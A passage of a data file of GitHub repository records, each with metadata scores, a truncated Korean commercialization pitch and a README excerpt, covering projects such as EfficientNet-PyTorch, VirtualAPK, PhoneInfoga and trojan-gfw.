EfficientNet-PyTorch 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 빠르고 정확하게 인식하는 인공지능 기술로, 적은 컴퓨터 자원으로도 높은 성능을 낼 수 있어 실제 서비스에 바로 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n**1. 이미지 검색 SaaS**: 쇼핑몰에서 옷 사진을 찍으면 비슷한 상품을 추천해주는 서비스로 구독료 수익화","readme_excerpt":"# EfficientNet PyTorch\n\n### Quickstart\n\nInstall with `pip install efficientnet_pytorch` and load a pretrained EfficientNet with:\n```python\nfrom efficientnet_pytorch import EfficientNet\nmodel = EfficientNet.from_pretrained('efficientnet-b0')\n```\n\n### Updates\n\n#### Update (April 2, 2021)\n\nThe [EfficientNetV2 paper](https://arxiv.org/abs/2104.00298) has been released! I am working on implementing it as you read this :) \n\nAbout EfficientNetV2:\n> EfficientNetV2 is a new family of convolutional networks that have faster training speed and better parameter efficiency than previous models. To develop this family of models, we use a combination of training-aware neural architecture search and scaling, to jointly optimize training speed and parameter efficiency. The models were searched from the search space enriched with new ops such as Fused-MBConv. \n\nHere is a comparison: \n> <img src=\"https://github.com/lukemelas/EfficientNet-PyTorch/releases/download/1.0/efficientnetv2-image.png\" width=\"100%","composite_score":0.5618,"license_safety_tag":"safe"},{"name":"didi/VirtualAPK","github_url":"https://github.com/didi/VirtualAPK","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":35,"description":"# VirtualAPK 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱을 마치 여러 개 설치한 것처럼 동작하게 해주는 기술로, 게임이나 앱 개발 회사들이 복잡한 문제를 쉽게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 다중 계정 서비스**: 게이머들이 하나의 폰에서 여러 게임 계정을 동시에 관리할 수 있는 SaaS 플랫폼\n2. **앱 테스트","readme_excerpt":"# Android 9.0 supported! Please use [the lastest release](https://github.com/didi/VirtualAPK/releases).\n\n# <img src=\"imgs/va-logo.png\" width=\"200px\" align=\"center\" alt=\"VirtualAPK\"/>\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/didi/VirtualAPK/blob/master/LICENSE)\n[![Release Version](https://img.shields.io/badge/release-0.9.8-red.svg)](https://github.com/didi/VirtualAPK/releases)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/didi/VirtualAPK/pulls)\n\nVirtualAPK is a powerful yet lightweight plugin framework for Android. It can dynamically load and run an APK file (we call it `LoadedPlugin`) seamlessly as an installed application. Developers can use any Class, Resources, Activity, Service, Receiver and Provider in `LoadedPlugin` as if they are registered in app's manifest file.\n\n![VirtualAPK](imgs/va.png)\n\n# Supported Features\n\n| Feature | Detail |\n|:-------------|:-------------:|\n","composite_score":0.5615,"license_safety_tag":"safe"},{"name":"DeathKing/Learning-SICP","github_url":"https://github.com/DeathKing/Learning-SICP","stars":7,"language":"Ruby","license":"unknown","abandonment_months":32,"description":"# DeathKing/Learning-SICP 분석\n\n## 왜 보물인가\n컴퓨터 과학의 기초 원리를 체계적으로 배울 수 있는 학습 자료로, 프로그래밍 교육 시장에서 높은 수요를 보이고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 SaaS**: 프로그래밍 초보자를 위한 온라인 강의 플랫폼의 커리큘럼 및 학습 자료로 활용\n2. **기업 교육 도구**: I","readme_excerpt":"# 《计算机程序的结构和解释》公开课 翻译项目\n\n<img height=\"20px\" src=\"https://user-images.githubusercontent.com/895809/47278305-6d793380-d5fa-11e8-89f2-7c8862027997.png\" alt=\"MIT OCW\"> [MIT OpenCourseWare](https://ocw.mit.edu/index.htm)　　　　　　<img height=\"20px\" src=\"https://avatars2.githubusercontent.com/u/36149682?s=200&v=4\" alt=\"HIT IBMTC\"> [哈尔滨工业大学 IBM技术中心](https://github.com/HIT-IBMTC)　　　　　　<img height=\"20px\" src=\"https://user-images.githubusercontent.com/895809/47278313-7cf87c80-d5fa-11e8-9ca8-0f5f19c1d31e.jpg\" alt=\"HIT PT\"> [哈尔滨工业大学 清影PT](https://hitpt.org/index.php)\n\n<p align=\"center\">\n  <img src=\"http://groups.csail.mit.edu/mac/classes/6.001/abelson-sussman-lectures/wizard.jpg\" alt=\"SICP\"/>\n</p>\n\n《计算机程序的构造和解释》系列公开课，视频是两位作者（Harold Abelson、Gerald Jay Sussman）在1986年7月给**Hewlett-Packard**公司员工培训时的录像。你可以在[这里](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-001-structure-and-interpretation-of-computer-programs-spring-2005/)获得这门课程的视频。\n\n这门课程只提供了英文字幕，本项目旨在将这些英文字幕翻译为中文，方便广大的`Scheme/Li","composite_score":0.5615,"license_safety_tag":"unknown"},{"name":"LisaDziuba/Awesome-Design-Tools","github_url":"https://github.com/LisaDziuba/Awesome-Design-Tools","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":22,"description":"# Awesome-Design-Tools 상품화 분석\n\n## 왜 보물인가\n디자인 작업에 필요한 모든 도구를 한곳에서 찾을 수 있는 '디자인 도구 백과사전'으로, 수시로 업데이트되는 신뢰할 수 있는 큐레이션 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 목록을 기반으로 \"디자이너를 위한 최고의 도구 추천 플랫폼\" 구독 서비스 - 월","readme_excerpt":"<div class=\"hidden-in-page\">\n\n# Awesome Design Tools\n\n- [Awesome Design Plugins](https://github.com/LisaDziuba/Awesome-Design-Tools/blob/master/Awesome-Design-Plugins.md)\n- [Awesome Design Conferences](https://github.com/LisaDziuba/Awesome-Design-Tools/blob/master/Awesome-Design-Conferences.md)\n- [Awesome Design UI Kits](https://github.com/LisaDziuba/Awesome-Design-Tools/blob/master/Awesome-Design-UI-Kits.md)\n\n<p align=\"center\">\n    <a href=\"https://flawlessapp.io/designtools\">\n        <img src=\"https://github.com/LisaDziuba/Awesome-Design-Tools/blob/master/Media/Awesome-design-tools-cover.png\" alt=\"Awesome-Design-Tools\"/>\n    </a>\n</p>\n\n<p align=\"center\">\n    <img alt=\"awesome\" src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\" /> <img alt=\"PRs Welcome\" src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\" />\n</p>\n\n## Awesome Design Tools as a part of Flawless App family joins Abstract!\n\nToday, we’re excited to announce ","composite_score":0.561,"license_safety_tag":"safe"},{"name":"xiaoyufenfei/Efficient-Segmentation-Networks","github_url":"https://github.com/xiaoyufenfei/Efficient-Segmentation-Networks","stars":24,"language":"Python","license":"MIT","abandonment_months":22,"description":"","readme_excerpt":"## Efficient-Segmentation-Networks\n[![python-image]][python-url]\n[![pytorch-image]][pytorch-url]\n\nThis project aims at providing an easy-to-use, modifiable reference implementation for real-time semantic segmentation models using PyTorch.\n\n<p align=\"center\"><img width=\"100%\" src=\"docs/image-1.png\" /></p>\n---\n\n### Table of Contents:\n- <a href='#Requirements'>Requirements</a>\n- <a href='#Models'>Models</a>\n- <a href='#Dataset-Setting'>Dataset Setting</a>\n- <a href='#Usage'>Usage</a>\n- <a href='#Contact'>Contact</a>\n\n### Requirements\n\n [**PyTorch**](https://pytorch.org/) and [**Torchvision**](https://pytorch.org/) needs to be installed before running the scripts,  PyTorch v1.1 or later is supported. \n\n```bash\npip3 install -r requirements.txt\n```\n\n### Models\n\nThe project supports these semantic segmentation models as follows:\n- (**SQNet**) Speeding up Semantic Segmentation for Autonomous Driving [[Paper]](https://openreview.net/pdf?id=S1uHiFyyg)\n- (**LinkNet**)  Exploiting Encoder Represen","composite_score":0.5606,"license_safety_tag":"safe"},{"name":"keydotcat/keycatd","github_url":"https://github.com/keydotcat/keycatd","stars":8,"language":"Go","license":"MIT","abandonment_months":57,"description":"","readme_excerpt":"# Key.cat Password Manager\n******\n[![Codeship Status for keydotcat/keycatd](https://app.codeship.com/projects/03c1bc10-a7a0-0135-0335-16fec4d4b7f0/status?branch=master)](https://app.codeship.com/projects/255872) [![Maintainability](https://api.codeclimate.com/v1/badges/032a995c74982335ed9b/maintainability)](https://codeclimate.com/github/keydotcat/keycatd/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/032a995c74982335ed9b/test_coverage)](https://codeclimate.com/github/keydotcat/keycatd/test_coverage) \n\nKey.cat can manage all your credentials and lets you share them with others. The idea is to make a password manager that can work offline and sync when there's a connection available to the server. Like an auto-sync keepass.\n\n**This is beta software and things can break. Nonetheless API, data formats and encryption schemas will not change UNLESS THERE IS A REALLY GOOD REASON. In that case a migration path will be provided**\n\n  - Everything is encrypted end-to-en","composite_score":0.5604,"license_safety_tag":"safe"},{"name":"CheckChe0803/flink-recommandSystem-demo","github_url":"https://github.com/CheckChe0803/flink-recommandSystem-demo","stars":5,"language":"Java","license":"unknown","abandonment_months":28,"description":"# CheckChe0803/flink-recommandSystem-demo 분석\n\n## 왜 보물인가\n사용자의 행동 데이터를 분석해 맞춤형 상품을 추천해주는 실제 작동하는 시스템으로, 전자상거래나 콘텐츠 플랫폼의 매출 증대에 직접 기여할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 쇼핑몰 운영자를 위한 \"AI 추천 엔진 월 구독 서비","readme_excerpt":"# 商品实时推荐系统\n\n### 1. 系统架构  v2.0\n\n- **1.1 系统架构图**\n\n  <div align=center><img src=\"resources/pic/v2.0架构.png\" width=\"100%\" height=\"100%\"></div>\n\n- **1.2模块说明**\n\n- a.在日志数据模块(flink-2-hbase)中,又主要分为6个Flink任务:\n\n  - 用户-产品浏览历史  -> 实现基于协同过滤的推荐逻辑 \n\n    通过Flink去记录用户浏览过这个类目下的哪些产品,为后面的基于Item的协同过滤做准备\n    实时的记录用户的评分到Hbase中,为后续离线处理做准备.\n\n    数据存储在Hbase的p_history表\n\n  - 用户-兴趣 -> 实现基于上下文的推荐逻辑\n\n    根据用户对同一个产品的操作计算兴趣度,计算规则通过操作间隔时间(如购物 - 浏览 < 100s)则判定为一次兴趣事件\n    通过Flink的ValueState实现,如果用户的操作Action=3(收藏),则清除这个产品的state,如果超过100s没有出现Action=3的事件,也会清除这个state\n\n    数据存储在Hbase的u_interest表\n\n  - 用户画像计算 -> 实现基于标签的推荐逻辑\n\n    v1.0按照三个维度去计算用户画像,分别是用户的颜色兴趣,用户的产地兴趣,和用户的风格兴趣.根据日志不断的修改用户画像的数据,记录在Hbase中.\n\n    数据存储在Hbase的user表\n\n  - 产品画像记录  -> 实现基于标签的推荐逻辑\n\n    用两个维度记录产品画像,一个是喜爱该产品的年龄段,另一个是性别\n\n    数据存储在Hbase的prod表\n\n  - 事实热度榜 -> 实现基于热度的推荐逻辑 \n\n    通过Flink时间窗口机制,统计当前时间的实时热度,并将数据缓存在Redis中.\n\n    通过Flink的窗口机制计算实时热度,使用ListState保存一次热度榜\n\n    数据存储在redis中,按照时间戳存储list\n\n  - 日志导入\n\n    从Kafka接收的数据直接导入进Hbase事实表,保存完整的日志log,日志中包含了用户Id,用户操作的产品id,操作时间,行为(如购买","composite_score":0.5593,"license_safety_tag":"unknown"},{"name":"alfred-workflows/awesome-alfred-workflows","github_url":"https://github.com/alfred-workflows/awesome-alfred-workflows","stars":7,"language":"","license":"unknown","abandonment_months":22,"description":"# awesome-alfred-workflows 분석\n\n## 왜 보물인가\n맥 사용자들이 매일 반복하는 작업을 자동화해주는 실용적인 도구 모음으로, 업무 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 맥 사용자 대상 자동화 플랫폼으로 개별 워크플로우를 판매하는 마켓플레이스\n2. **내부 업무 도구**: 회사의 반복 ","readme_excerpt":"> [!WARNING]\n> This list is deprecated in favour of [the official Alfred Gallery](https://alfred.app/).\n> Future submissions should be directed there.\n\n## Contents\n- [Communication](#communication)\n- [Developer](#developer)\n- [Helpers](#helpers)\n- [Miscellaneous](#miscellaneous)\n- [Multimedia](#multimedia)\n- [Productivity](#productivity)\n- [Scientific](#scientific)\n- [Security](#security)\n- [System](#system)\n- [Text Manipulation](#text-manipulation)\n- [Web](#web)\n- [Other Lists](#other-lists)\n\n## Communication\n- [Adium](http://www.alfredforum.com/topic/1274-adium-workflow/) - Adium workflow to chat with people on your list.\n- [MailTo](https://github.com/deanishe/alfred-mailto) - Quickly compose emails to your contacts and contact groups.\n- [Mailsy](https://github.com/BalliAsghar/mailsy-alfred) - Quickly generate a disposable email.\n- [Slack](https://github.com/yannickglt/alfred-slack) - Alfred workflow to interact, and perform various functions with the service Slack.\n- [TemporaryEmail","composite_score":0.5593,"license_safety_tag":"unknown"},{"name":"raywenderlich/swift-algorithm-club","github_url":"https://github.com/raywenderlich/swift-algorithm-club","stars":6,"language":"Swift","license":"mit","abandonment_months":18,"description":"# Swift Algorithm Club 상용화 분석\n\n## 왜 보물인가\n프로그래밍 초보자들이 컴퓨터 과학의 핵심 원리를 쉽게 배우고 실제 앱 개발에 적용할 수 있는 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **프로그래밍 온라인 교육 플랫폼**: 코딩 학원이나 온라인 강의 사이트에서 수강생들에게 알고리즘 학습 콘텐츠로 제공하고 월 구독료 수","readme_excerpt":"![Swift Algorithm Club](Images/SwiftAlgorithm-410-transp.png)\n\n# Welcome to the Swift Algorithm Club!\n\nHere you'll find implementations of popular algorithms and data structures in everyone's favorite new language Swift, with detailed explanations of how they work.\n\nIf you're a computer science student who needs to learn this stuff for exams -- or if you're a self-taught programmer who wants to brush up on the theory behind your craft -- you've come to the right place!\n\nThe goal of this project is to **explain how algorithms work**. The focus is on clarity and readability of the code, not on making a reusable library that you can drop into your own projects. That said, most of the code should be ready for production use but you may need to tweak it to fit into your own codebase.\n\nCode is compatible with **Xcode 10** and **Swift 4.2**. We'll keep this updated with the latest version of Swift. If you're interested in a GitHub pages version of the repo, check out [this](https://aquarchite","composite_score":0.5591,"license_safety_tag":"safe"},{"name":"rclone/rclone-webui-react","github_url":"https://github.com/rclone/rclone-webui-react","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":24,"description":"","readme_excerpt":"# Rclone Web UI  [![Google Summer of Code 19](https://img.shields.io/badge/Google%20Summer%20of%20Code-2019%202020-blue.svg)](https://summerofcode.withgoogle.com/projects/#5104629795258368) [![CCExtractor](https://img.shields.io/badge/CCExtractor-org-red.svg)](https://www.ccextractor.org/) [![RClone](https://img.shields.io/badge/RClone-org-blue.svg)](https://rclone.org/)\n\n**Latest hosted release:** https://rclone.github.io/rclone-webui-react\n\n\n\n## Build Status\n\n![Node CI](https://github.com/rclone/rclone-webui-react/workflows/Node%20CI/badge.svg)\n![Code scanning](https://github.com/rclone/rclone-webui-react/workflows/Code%20scanning%20-%20action/badge.svg)\n[![Coverage Status](https://coveralls.io/repos/github/rclone/rclone-webui-react/badge.svg?branch=master)](https://coveralls.io/github/rclone/rclone-webui-react?branch=master)\n\n## About\n\nThis project under development as a part of Google Summer of Code 2019 and 2020 under [ccextractor.org](https://ccextractor.org) and [rclone.org](htt","composite_score":0.5589,"license_safety_tag":"safe"},{"name":"howdyai/botkit","github_url":"https://github.com/howdyai/botkit","stars":5,"language":"TypeScript","license":"mit","abandonment_months":23,"description":"# Botkit 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 챗봇(대화형 AI)을 만들 수 있는 오픈소스 도구로, 프로그래밍 지식 없이도 고객 응답 자동화 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 SaaS**: 소매업체나 식당이 24시간 자동 주문/예약 응답을 처리하는 웹 서비스\n2. **기업 내부 도구**: 회사 HR팀","readme_excerpt":"# ![Botkit](banner.png)\n\n**Botkit is an open source developer tool for building chat bots, apps and custom integrations for major messaging platforms.**\n\nThis repository contains the core Botkit library, as well as a series of plugins and extensions for connecting Botkit to messaging and chat platforms and other tools in the bot building ecosystem.\n\nBotkit is part of the [Microsoft Bot Framework](https://dev.botframework.com)\nand is released under the [MIT Open Source license](LICENSE.md)\n\n# Use Botkit\n\n* [Install Botkit and get started](packages/botkit#readme)\n* [Botkit Core Docs](https://github.com/howdyai/botkit/blob/main/packages/docs/index.md)\n* [Botkit Platform Support](https://github.com/howdyai/botkit/blob/main/packages/docs/platforms/index.md)\n* [Botkit Class Reference](https://github.com/howdyai/botkit/blob/main/packages/docs/reference/index.md)\n\n## Packages included in this repo\n\n| Package | Description | NPM Status\n|--- |--- |---\n| [botkit](packages/botkit) | Botkit Core li","composite_score":0.5588,"license_safety_tag":"safe"},{"name":"mmumshad/simple-webapp-flask","github_url":"https://github.com/mmumshad/simple-webapp-flask","stars":222,"language":"Python","license":"MIT","abandonment_months":23,"description":"","readme_excerpt":"","composite_score":0.5579,"license_safety_tag":"safe"},{"name":"7-sevens/Developer-Books","github_url":"https://github.com/7-sevens/Developer-Books","stars":9,"language":"","license":"unknown","abandonment_months":38,"description":"# Developer-Books 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍을 배우려는 사람들이 어떤 책을 읽어야 할지 쉽게 찾을 수 있도록 정리해놓은 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 온라인 코딩 학원이 커리큘럼별 추천 도서 목록을 제공하는 기능\n2. **기업 내부 도구**: IT 회사가 신입사원 온보딩 시 필독","readme_excerpt":"# Repository Describe\n\n>- repository:  [Developer Books List](https://github.com/7-sevens/Developer-Books)\n>\n>- brief: 编程开发相关书单列表整理，持续更新...\n>\n>- 编程开发交流QQ群：617705355\n>\n\n## 编程语言相关书单列表\n\n### 汇编\n\n- [《汇编语言》](https://github.com/7-sevens/Developer-Books)\n\n\n### C\n\n- [《The_C_Programing_Language》](https://github.com/7-sevens/Developer-Books)\n- [《你必须知道的495个C语言问题》](https://github.com/7-sevens/Developer-Books)\n- [《C专家编程》](https://github.com/7-sevens/Developer-Books)\n- [《C和指针》](https://github.com/7-sevens/Developer-Books)\n- [《C陷阱与缺陷》](https://github.com/7-sevens/Developer-Books)\n- [《C语言接口与实现》](https://github.com/7-sevens/Developer-Books)\n- [《C语言标准与实现》](https://github.com/7-sevens/Developer-Books)\n- [《C语言深度解剖》](https://github.com/7-sevens/Developer-Books)\n\n\n### C++\n\n- [《C++ Primer（第5版）》](https://github.com/7-sevens/Developer-Books)\n- [《C++ Primer Plus（第5版）》](https://github.com/7-sevens/Developer-Books)\n- [《C++ STL中文版》](https://github.com/7-sevens/Developer-Books)\n- [《Effective C++中文版》](https://github.","composite_score":0.5562,"license_safety_tag":"unknown"},{"name":"ExpertAnonymous/PhoneInfoga","github_url":"https://github.com/ExpertAnonymous/PhoneInfoga","stars":5,"language":"Shell","license":"unknown","abandonment_months":63,"description":"# PhoneInfoga 가치 분석\n\n## 왜 보물인가\n전화번호만 입력하면 그 번호의 소유자 정보를 자동으로 찾아주는 도구로, 개인 신원 조회나 고객 검증이 필요한 사업에 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 금융사/보험사를 위한 \"고객 신원 자동 확인 플랫폼\" - 가입자가 실제 사람인지 검증\n2. **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://i.imgur.com/LtUGnF3.png\" width=500 />\n</p>\n\n<div align=\"center\">\n  <a href=\"https://travis-ci.org/sundowndev/PhoneInfoga\">\n    <img src=\"https://img.shields.io/travis/sundowndev/PhoneInfoga/master.svg?style=flat-square\" alt=\"Build Status\" />\n  </a>\n  <a href=\"https://hub.docker.com/r/sundowndev/phoneinfoga/builds\">\n    <img src=\"https://img.shields.io/docker/cloud/build/sundowndev/phoneinfoga.svg?style=flat-square\" alt=\"Build Status\" />\n  </a>\n  <a href=\"#\">\n    <img src=\"https://img.shields.io/badge/python-3.6-blue.svg?style=flat-square\" alt=\"Python version\" />\n  </a>\n  <a href=\"https://github.com/sundowndev/PhoneInfoga/releases\">\n    <img src=\"https://img.shields.io/github/release/SundownDEV/PhoneInfoga.svg?style=flat-square\" alt=\"Latest version\" />\n  </a>\n  <a href=\"https://github.com/sundowndev/PhoneInfoga/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/sundowndev/PhoneInfoga.svg?style=flat-square\" alt=\"License\" />\n  ","composite_score":0.556,"license_safety_tag":"unknown"},{"name":"thesam73/wordle","github_url":"https://github.com/thesam73/wordle","stars":51,"language":"TypeScript","license":"MIT","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.5553,"license_safety_tag":"safe"},{"name":"microsoft/vscode-dev-containers","github_url":"https://github.com/microsoft/vscode-dev-containers","stars":6,"language":"Shell","license":"MIT","abandonment_months":30,"description":"# microsoft/vscode-dev-containers 분석\n\n## 왜 보물인가\n프로그래머들이 새로운 프로젝트를 시작할 때 필요한 모든 도구를 자동으로 준비해주는 틀(템플릿) 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 코딩 교육 플랫폼에서 학생들이 복잡한 설정 없이 즉시 프로그래밍을 시작할 수 있는 환경 제공\n2. **내부 ","readme_excerpt":"**IMPORTANT NOTE: Dev containers have a new, expanded home in the [dev containers GitHub org](https://github.com/devcontainers)! We're so excited to connect with you there. To learn more, you can check out our [migration announcement](https://github.com/microsoft/vscode-dev-containers/issues/1762).**\n\n**This repository is no longer active and was archived in November 2023. We've migrated most of the contents of this repo to the [devcontainers GitHub org](https://github.com/devcontainers), as part of the work on the [open Dev Container specification](https://containers.dev).**\n\n- **Features managed by the Dev Container spec maintainers (such as the VS Code team) are now in [devcontainers/features](https://github.com/devcontainers/features).**\n- **Definitions/Templates managed by the Dev Container spec maintainers are now in [devcontainers/templates](https://github.com/devcontainers/templates).**\n- **`mcr.microsoft.com/devcontainers` and `mcr.microsoft.com/vscode/devcontainers` images ar","composite_score":0.5552,"license_safety_tag":"safe"},{"name":"samarthagarwal/FlutterScreens","github_url":"https://github.com/samarthagarwal/FlutterScreens","stars":18,"language":"Dart","license":"unknown","abandonment_months":27,"description":"# FlutterScreens 저장소 분석\n\n## 왜 보물인가\nFlutter라는 앱 개발 도구로 만든 다양한 화면 디자인 템플릿 모음으로, 앱 개발자들이 처음부터 디자인할 필요 없이 바로 사용할 수 있는 실용적인 자산입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 앱 개발 초보자 대상 \"빠른 프로토타입 생성 서비스\" - 템플릿을 선택하면 자","readme_excerpt":"# Flutter Screens\n\nA collection of Login Screens, Buttons, Loaders and Widgets with attractive UIs, built with Flutter, ready to be used in your applications.\n\n###### Last Update: Added SlideListView Widget\n\n## Screenshots And Usage\n\n## SlideListView\n\nA widget that can be used to present two different views that can be toggled using a Floating Action Button. The views toggle with a nice cube-rotation animation.\n\n![Screenshots on iOS](./screenshots/slide_list_view.gif)\n\n## Rating\n\n![Screenshots on iOS](./screenshots/rating.gif)\n\n## Loaders\n\n![Screenshots on iOS](./screenshots/loaders.gif)\n\n#### ColorLoaders\n\n| ![Screenshot](./screenshots/color_loader.gif) Color Loader 1 | ![Screenshot](./screenshots/color_loader_2.gif) Color Loader 2 | ![Screenshot](./screenshots/color_loader_3.gif) Color Loader 3 |\n|-----------------------------------------------|-----------------------------------------------|-----------------------------------------------|\n| ![Screenshot](./screenshots/color_loader_4","composite_score":0.555,"license_safety_tag":"unknown"},{"name":"trojan-gfw/trojan","github_url":"https://github.com/trojan-gfw/trojan","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":21,"description":"# Trojan-GFW 저장소 분석\n\n## 왜 보물인가\n인터넷 검열을 우회하여 정보 접근의 자유를 보장하는 오픈소스 기술로, 전 세계 인터넷 자유도가 낮은 지역의 사용자들이 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스 SaaS**: 인터넷 검열이 있는 국가의 사용자를 대상으로 월 구독형 우회 서비스 제공\n2. **","readme_excerpt":"# trojan\n\n[![Build Status](https://dev.azure.com/GreaterFire/Trojan-GFW/_apis/build/status/trojan-gfw.trojan?branchName=master)](https://dev.azure.com/GreaterFire/Trojan-GFW/_build/latest?definitionId=5&branchName=master)\n\nAn unidentifiable mechanism that helps you bypass GFW.\n\nTrojan features multiple protocols over `TLS` to avoid both active/passive detections and ISP `QoS` limitations.\n\nTrojan is not a fixed program or protocol. It's an idea, an idea that imitating the most common service, to an extent that it behaves identically, could help you get across the Great FireWall permanently, without being identified ever. We are the GreatER Fire; we ship Trojan Horses.\n\n## Documentations\n\nAn online documentation can be found [here](https://trojan-gfw.github.io/trojan/).  \nInstallation guide on various platforms can be found in the [wiki](https://github.com/trojan-gfw/trojan/wiki/Binary-&-Package-Distributions).\n\n## Contributing\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md).\n\n## Dependencies\n\n","composite_score":0.5549,"license_safety_tag":"restricted"},{"name":"extreme-assistant/ICCV2021-Paper-Code-Interpretation","github_url":"https://github.com/extreme-assistant/ICCV2021-Paper-Code-Interpretation","stars":7,"language":"","license":"unknown","abandonment_months":33,"description":"# ICCV2021-Paper-Code-Interpretation 평가 보고서\n\n## 왜 보물인가\n2021년 국제 컴퓨터 비전 학회의 연구 논문들을 실제 동작하는 코드로 해석한 자료이어서, 최신 이미지 처리 기술을 배우고 실무에 적용하려는 사람들에게 즉시 참고할 수 있는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 개발사 교육용 SaaS**","readme_excerpt":"# ICCV2023/ICCV2021/ICCV2019/ICCV2017(Paper/Code/Project/Paper reading)\r\n\r\n1987~2019年历届 ICCV 最佳论文汇总及下载：http://bbs.cvmart.net/articles/909\r\n<br><br>\r\n\r\n# 目录\r\n\r\n[4. ICCV2023论文/代码/直播](#4)<br>\r\n[3. ICCV2021论文/代码/直播](#3)<br>\r\n[2. ICCV2019论文/代码/直播](#2)<br>\r\n[1. ICCV2017/CVPR/NIPS](#1)<br>\r\n[0. To do list](#todolist)<br>\r\n\r\n\r\n\r\n\r\n<br>\r\n<a name=\"4\"/> \r\n \r\n# 4. ICCV2023最新论文解读/直播汇总（持续更新中）\r\n* [PaperReading／Demos/直播分享／论文分享会等](https://www.cvmart.net/community/detail/8015)\r\n\r\n\r\n<br>\r\n<a name=\"3\"/> \r\n\r\n# 3. ICCV2021最新论文分类汇总(持续更新)\r\n* [Papers/Codes/Project/PaperReading／Demos/直播分享／论文分享会等](https://github.com/extreme-assistant/ICCV2021-Paper-Code-Interpretation/blob/master/ICCV2021.md)\r\n* ICCV2021全部论文下载\r\n  * [ICCV2021接收list](https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vRfaTmsNweuaA0Gjyu58H_Cx56pGwFhcTYII0u1pg0U7MbhlgY0R6Y-BbK3xFhAiwGZ26u3TAtN5MnS/pubhtml)\r\n* ICCV2021论文解读汇总 + 技术直播汇总\r\n* ICCV2021 Oral论文汇总/解读\r\n\r\n\r\n\r\n<br>\r\n<a name=\"2\"/> \r\n\r\n# 2. ICCV2019论文/代码/直播\r\n\r\nICCV 2019 papers/news<br>\r\nICCV2019官网","composite_score":0.5549,"license_safety_tag":"unknown"},{"name":"react-ui-kit/dribbble2react","github_url":"https://github.com/react-ui-kit/dribbble2react","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":57,"description":"# react-ui-kit/dribbble2react 평가\n\n## 왜 보물인가\n디자인 작업물을 실제 웹사이트 코드로 자동 변환해주는 도구로, 디자이너와 개발자 간의 작업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 제작 SaaS**: 디자인 파일을 업로드하면 즉시 웹페이지 코드가 생성되는 저코드 플랫폼\n2. **디자인","readme_excerpt":"# dribbble2react\nWe're transforming [Dribbble](https://dribbble.com/) designs to React / React-Native code\n\nDon't miss the updates when I release new apps, just subscribe to our [React-UI-Kit newsletter](https://react-ui-kit.com/).\n\nCheckout the new React-Native marketplace for ready-to-use UI code [react-ui-kit.com](https://react-ui-kit.com/)\n\n| Project | Expo | Preview | Screens | Estimation | Status |\n| ------ | ------ | :------: | :------: | :------: | :------: |\n| [Camping Spots Finder App](https://dribbble.com/shots/5765449-Camping-Spots-Finder-App-Day-364-365-Project365/attachments/1243964) | [View Snack](https://snack.expo.io/@react-ui-kit/camping-spots-finder-app) | <img src=\"https://cdn.dribbble.com/users/386883/screenshots/5765449/attachments/1243964/30122018-design.png\" width=\"120\" /> | 2 | 5 hours | :white_check_mark: |\n| [Velocity UI Kit](https://www.invisionapp.com/inside-design/design-resources/design-system-dashboard-ui-kit/) | [View Snack](https://snack.expo.io/@react","composite_score":0.5548,"license_safety_tag":"safe"},{"name":"keras-rl/keras-rl","github_url":"https://github.com/keras-rl/keras-rl","stars":7,"language":"Python","license":"MIT","abandonment_months":33,"description":"# keras-rl 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 스스로 최적의 선택을 배우도록 하는 핵심 기술(강화학습)을 누구나 쉽게 사용할 수 있게 만든 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임/시뮬레이션 SaaS**: 게임 NPC 인공지능 자동 학습 시스템을 클라우드로 제공하는 구독 서비스\n2. **로봇/드론 제어 솔루션**: 자율주행 로봇","readme_excerpt":"# Deep Reinforcement Learning for Keras\n\n[![Build Status](https://api.travis-ci.org/keras-rl/keras-rl.svg?branch=master)](https://travis-ci.org/keras-rl/keras-rl)\n[![Documentation](https://readthedocs.org/projects/keras-rl/badge/)](http://keras-rl.readthedocs.io/)\n[![License](https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000)](https://github.com/keras-rl/keras-rl/blob/master/LICENSE)\n[![Join the chat at 